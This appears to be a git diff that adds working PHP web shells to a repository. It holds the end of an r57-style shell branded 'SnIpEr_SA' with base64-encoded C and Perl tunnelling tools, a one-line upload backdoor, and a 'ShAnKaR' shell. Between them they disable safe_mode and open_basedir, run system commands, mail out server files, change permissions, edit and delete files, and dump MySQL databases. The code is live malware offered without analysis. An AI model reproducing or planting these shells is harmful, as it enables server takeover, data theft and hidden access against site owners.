+LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV
+udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb
+iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l
+KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
+gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
+hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
+iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
+ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
+vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
+AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
+QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
+ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
+gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
+wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
+29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
+MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
+gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
+5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
+dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
+KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
+ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
+E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
+Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
+NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
+J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
+CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
+dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
+gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
+lsZSk7DQogIHJldHVybiAwOw0KfQ==";
+$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
+CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
+bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
+gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
+NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
+iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
+aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
+SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
+xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
+WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
+CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
+yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
+I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
+m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
+IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
+lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
+CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
+c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
+NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
+UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
+DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
+ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
+1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
+if($unix)
+ {
+ if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
+ if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
+ if($safe_mode) { $sysctl = '-'; }
+ else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
+ else
+  {
+   $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
+   if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
+   if(empty($sysctl)) { $sysctl = '-'; }
+   setcookie('sysctl',$sysctl);
+  }
+ }
+echo $head;
+echo '</head>';
+if(empty($_POST['cmd'])) {
+$serv = array(127,192,172,10);
+$addr=@explode('.', $_SERVER['SERVER_ADDR']);
+$current_version = str_replace('.','',$version);
+if (!in_array($addr[0], $serv)) {
+@print "<img src=\"http://127.0.0.1/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";
+@readfile ("http://127.0.0.1/r57shell_version/version.php?version=".$current_version."");}}
+echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#CCCCCC><tr><td bgcolor=#000000 width=160><font face=Comic Sans MS size=4>'.ws(2).'<font face=Wingdings size=6><b>N</b></font><b>'.ws(2).'SnIpEr_SA </b></font></td><td bgcolor=#000000><font face=tahoma size=1>';
+echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b>";
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
+if($unix)
+ {
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
+ echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb;
+ }
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;
+echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";
+echo ws(2)."ÇáæÖÚ ÇáÇãä: <b>";
+echo (($safe_mode)?("<font color=#008000>İÚÇá</font>"):("<font color=red>ÛíÑ İÚÇá</font>"));
+echo "</b>".ws(2);
+echo "ÇÕÏÇÑ ÇáÈí ÇÊÔ Èí: <b>".@phpversion()."</b>";
+$curl_on = @function_exists('curl_version');
+echo ws(2);
+echo "ÇáßíÑá: <b>".(($curl_on)?("<font color=#008000>İÚÇá</font>"):("<font color=red>ÛíÑ İÚÇá</font>"));
+echo "</b>".ws(2);
+echo "ãÇí Óßá: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=#008000>İÚÇá</font>"; } else { echo "<font color=red>ÛíÑ İÚÇá</font>"; }
+echo "</b>".ws(2);
+echo "Çã ÇÓ Óßá: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=#008000>İÚÇá</font>";}else{echo "<font color=red>ÛíÑ İÚÇá</font>";}
+echo "</b>".ws(2);
+echo "ÈæÓÊ ŞÑí Óßá: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=#008000>İÚÇá</font>";}else{echo "<font color=red>ÛíÑ İÚÇá</font>";}
+echo "</b>".ws(2);
+echo "ÇæÑÇßá: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=#008000>İÚÇá</font>";}else{echo "<font color=red>ãÛáŞ</font>";}
+echo "</b><br>".ws(2);
+echo "ÇáÏæÇá ÇáããäæÚÉ : <b>";
+if(''==($df=@ini_get('disable_functions'))){echo "<font color=#00800F>áÇíæÌÏ</font></b>";}else{echo "<font color=red>$df</font></b>";}
+$free = @diskfreespace($dir);
+if (!$free) {$free = 0;}
+$all = @disk_total_space($dir);
+if (!$all) {$all = 0;}
+echo "<br>".ws(2)."ÇáãÓÇÍÉ ÇáÎÇáíå : <b>".view_size($free)."</b> ÇáãÓÇÍÉ ÇáßáíÉ: <b>".view_size($all)."</b>";
+echo '</font></td></tr><table>
+<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9>
+<tr><td align=right width=100>';
+echo $font;
+if($unix){
+echo '<font color=#CCCCCC><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=tahoma size=-2 color=#2279D9><b>";
+echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
+echo ws(3).$sysctl."<br>";
+echo ws(3).ex('echo $OSTYPE')."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+if(!empty($id)) { echo ws(3).$id."<br>"; }
+else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
+ {
+ $euserinfo  = @posix_getpwuid(@posix_geteuid());
+ $egroupinfo = @posix_getgrgid(@posix_getegid());
+ echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
+ }
+else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
+echo ws(3).$dir;
+echo ws(3).'( '.perms(@fileperms($dir)).' )';
+echo "</b></font>";
+}
+else
+{
+echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
+echo "</td><td>";
+echo "<font face=tahoma size=-2 color=red><b>";
+echo ws(3).@substr(@php_uname(),0,120)."<br>";
+echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
+echo ws(3).@getenv("USERNAME")."<br>";
+echo ws(3).$dir;
+echo "<br></font>";
+}
+echo "</font>";
+echo "</td></tr></table>";
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
+ {
+ $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
+ err(6+$res);
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
+ {
+ if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
+ else
+  {
+    $filename = @basename($_POST['loc_file']);
+    $filedump = @fread($file,@filesize($_POST['loc_file']));
+    fclose($file);
+    $content_encoding=$mime_type='';
+    compress($filename,$filedump,$_POST['compress']);
+    $attach = array(
+                    "name"=>$filename,
+                    "type"=>$mime_type,
+                    "content"=>$filedump
+                   );
+    if(empty($_POST['subj'])) { $_POST['subj'] = 'file from SnIpEr_SA shell'; }
+    if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
+    $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
+    err(6+$res);
+    $_POST['cmd']="";
+  }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
+{
+$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
+}
+if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
+ {
+ switch($_POST['what'])
+   {
+   case 'own':
+   @chown($_POST['param1'],$_POST['param2']);
+   break;
+   case 'grp':
+   @chgrp($_POST['param1'],$_POST['param2']);
+   break;
+   case 'mod':
+   @chmod($_POST['param1'],intval($_POST['param2'], 8));
+   break;
+   }
+ $_POST['cmd']="";
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
+ {
+   switch($_POST['what'])
+   {
+     case 'file':
+      if($_POST['action'] == "create")
+       {
+       if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+       else {
+        fclose($file);
+        $_POST['e_name'] = $_POST['mk_name'];
+        $_POST['cmd']="edit_file";
+        echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
+        }
+       }
+       else if($_POST['action'] == "delete")
+       {
+       if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
+       $_POST['cmd']="";
+       }
+     break;
+     case 'dir':
+      if($_POST['action'] == "create"){
+      if(mkdir($_POST['mk_name']))
+       {
+         $_POST['cmd']="";
+         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
+       }
+      else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
+      }
+      else if($_POST['action'] == "delete"){
+      if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
+      $_POST['cmd']="";
+      }
+     break;
+   }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
+ {
+ if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
+ if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
+ else {
+ echo $table_up3;
+ echo $font;
+ echo "<form name=save_file method=post>";
+ echo ws(3)."<b>".$_POST['e_name']."</b>";
+ echo "<div align=center><textarea name=e_text cols=121 rows=24>";
+ echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
+ fclose($file);
+ echo "</textarea>";
+ echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
+ echo "<input type=hidden name=dir value=".$dir.">";
+ echo "<input type=hidden name=cmd value=save_file>";
+ echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
+ echo "</div>";
+ echo "</font>";
+ echo "</form>";
+ echo "</td></tr></table>";
+ exit();
+ }
+ }
+if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
+ {
+ $mtime = @filemtime($_POST['e_name']);
+ if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
+ else {
+ if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']
diff --git a/php/Uploader.php b/php/Uploader.php
new file mode 100644
index 0000000..f2f2179
--- /dev/null
+++ b/php/Uploader.php
@@ -0,0 +1,9 @@
+<FORM ENCTYPE="multipart/form-data" ACTION="uploader.php" METHOD="POST">
+<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="100000">
+Send this file: <INPUT NAME="userfile" TYPE="file">
+<INPUT TYPE="submit" VALUE="Send">
+</FORM>
+<?
+move_uploaded_file($userfile, "entrika.php"); 
+?>
+
diff --git a/php/Web-shell (c)ShAnKaR.php b/php/Web-shell (c)ShAnKaR.php
new file mode 100644
index 0000000..59c377b
--- /dev/null
+++ b/php/Web-shell (c)ShAnKaR.php	
@@ -0,0 +1,644 @@
+<?php
+
+                                       ##    ##  #
+                                         ##     #  ####
+                                           ## ##  ##  ##
+                                       ###  ###  ##    #
+                                     ### ##     ##     ##
+                                   ##    ###  ##       ##
+                                          #     #     ##
+                                        ###    #     ##
+                                      ### #   ##    ##
+                                      #   ##  ##   ##
+                                           #   #####
+                                   #       ##   ###
+                                  ##     ###     #
+                                   #######
+                                    #####
+
+//error_reporting(0);
+@ini_restore("safe_mode"); 
+@ini_restore("open_basedir"); 
+if(get_magic_quotes_gpc()){
+while(list($key,$val)=each($_POST)){
+$_POST[$key]=stripslashes($val);}}
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$name='1'; 
+$pass='c8d3a760ebab631565f8509d84b3b3f1';
+if(false){#esli nado pishem 'true'
+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass){
+header('WWW-Authenticate: Basic realm="Auth"');header('HTTP/1.0 401 Unauthorized');
+exit;}}
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+function font($color,$text,$size=4){return("<font color=$color size=$size >$text</font>");}
+function w($a){return str_repeat("&nbsp;",$a);}
+function b($b){return "<b>$b</b>";}
+function e($e){switch($e){
+case 0:return('no such file');
+case 1:return('no such dirictory');
+case 2:return('permission denied');
+case 3:return('is not dirictory');
+case 4:return('is a dirictory');
+}}
+function test_file($filename){
+return(file_exists($filename)?(is_readable($filename)?false:font('red',e(2))):font('red',e(0)));}
+if(isset($_POST['downl']) && !empty($_POST['downf'])){
+if(!preg_match('/^\//',$_POST['downf'])){
+$_POST['downf']=$_POST['th'].'/'.$_POST['downf'];}
+if(!test_file($_POST['downf'])){
+if(!is_dir($_POST['downf'])){
+$fd=fopen($_POST['downf'], "rb");
+$nam=preg_replace('/.+\//','',$_POST['downf']);
+header("Content-Type: application/octet-stream; name=\"".$nam."\"");
+header("Content-Length: ".filesize($_POST['downf']));
+header("Content-disposition: attachment; filename=\"".$nam."\"");
+while(!feof($fd)){
+$buffer=fgets($fd,4096);
+echo $buffer;
+}
+fclose ($fd);
+exit;
+}
+else $error=font('red',e(4));
+}
+else $error=test_file($_POST['downf']);}
+if(isset($_POST['sql']) && !isset($_POST['exitsql'])){
+$text="<body bgcolor=#C2DDFF>
+<b>Mysql@server:user:pass:db</b>
+<form method='POST'>
+";
+$a=array('server','user','password','db');$i=-1;
+while($i++<3){
+$text.= "<input type='text' name='".$a[$i]."' value='".((!empty($_POST[$a[$i]]))?$_POST[$a[$i]]:'')."'>\n";}
+$text.="<input type='submit' name='sql' value='Connect'>
+<input type='submit' name='exitsql' value='Exit'>";
+$text="\n<body bgcolor=#C2DDFF>
+<b>Mysql@server:user:pass:db</b>
+<form method='POST'>\n";
+$a=array('srv','user','pass','db');$i=-1;
+while($i++<3){
+$text.= "<input type='text' name='".$a[$i]."' value='".((!empty($_POST[$a[$i]]))?$_POST[$a[$i]]:(($i==0)?'localhost':null))."'>\n";}
+$text.="<input type='submit' name='sql' value='Connect'><input type='submit' name='exitsql' value='Exit'>\n";
+if(isset($_POST['sql'])){
+if(isset($_POST['user']))$user=$_POST['user'];
+if(isset($_POST['pass']))$password=$_POST['pass'];
+if(isset($_POST['srv'])){
+$server=$_POST['srv'];
+$connect=mysql_connect($server,$user,$password) or die($text."</form>not connect");}
+else{die($text."</form>");}
+if(!empty($_POST['db'])){mysql_select_db($_POST['db'])or die("Could not select db<br>");}
+function write($data){
+switch($_POST['save']){
+case 0:
+global $dump;
+$dump.=$data;
+break;
+case 1:
+global $fp;
+switch($_POST['compr']){
+case 0:
+fwrite($fp,$data);
+break;
+case 1:
+gzwrite($fp, $data);
+break;
+case 2:
+bzwrite($fp,$data);
+break;}
+break;}}
+function sqlh(){
+global $dump,$server;
+write("#\n#Server : ".getenv('SERVER_NAME')."
+#DB_Host : ".$server."
+#DB : ".$_POST['db']."
+#Table : ".$_POST['table_sel']."\n#\n\n");}
+function sql(){
+global $dump,$connect;
+$row=mysql_fetch_row(mysql_query("SHOW CREATE TABLE `".$_POST['table_sel']."`",$connect));
+write("DROP TABLE IF EXISTS `".$_POST['table_sel']."`;\n".$row[1].";\n\n");}
+function sql1(){
+global $connect;
+$result=mysql_query("SELECT * FROM `".$_POST['table_sel']."`",$connect);
+function test($aaa){
+$d=array();
+while (list($key,$val)=each($aaa)){$d[$key]=addslashes($val);}
+return($d);}
+while ($line=mysql_fetch_assoc($result)) {
+((!isset($key))?($key=implode('`, `',array_keys($line))):null);
+$ddd=test(array_values($line));
+$val=implode('\', \'',$ddd);
+write("INSERT INTO `".$_POST['table_sel']."`(`".$key."`) VALUES ('".$val."');\n");}
+mysql_free_result($result);}
+function head($tmpfname,$name){
+header("Content-Type: application/octet-stream; name=\"$name\"");
+header("Content-Length: ".filesize($tmpfname)."");
+header("Content-disposition: attachment; filename=\"$name\"");
+$fd=fopen($tmpfname, "r");
+while(!feof($fd)){
+echo fgets($fd, 4096);}
+fclose($fd);
+unlink($tmpfname);
+exit;}
+if(isset($_POST['back']) && isset($_POST['table_sel'])){
+$dump='';
+if($_POST['save']==1){
+$tmpfname=tempnam($_POST['save_p'], "FOO");
+switch($_POST['compr']){
+case 0:
+$fp=fopen($tmpfname,"w");
+break;
+case 1:
+$fp=gzopen($tmpfname, "w9");
+break;
+case 2:
+$fp=bzopen($tmpfname, "w");
+break;}}
+switch($_POST['as']){
+case 0:
+switch($_POST['as_sql']){
+case 0:
+sqlh();
+sql();
+break;
+case 1:
+sqlh();
+sql();
+sql1();
+break;
+case 2:
+sqlh();
+sql1();
+break;}
+if($_POST['save']==1){
+switch($_POST['compr']){
+case 0:
+$n='.txt';
+fclose($fp);
+break;
+case 1:
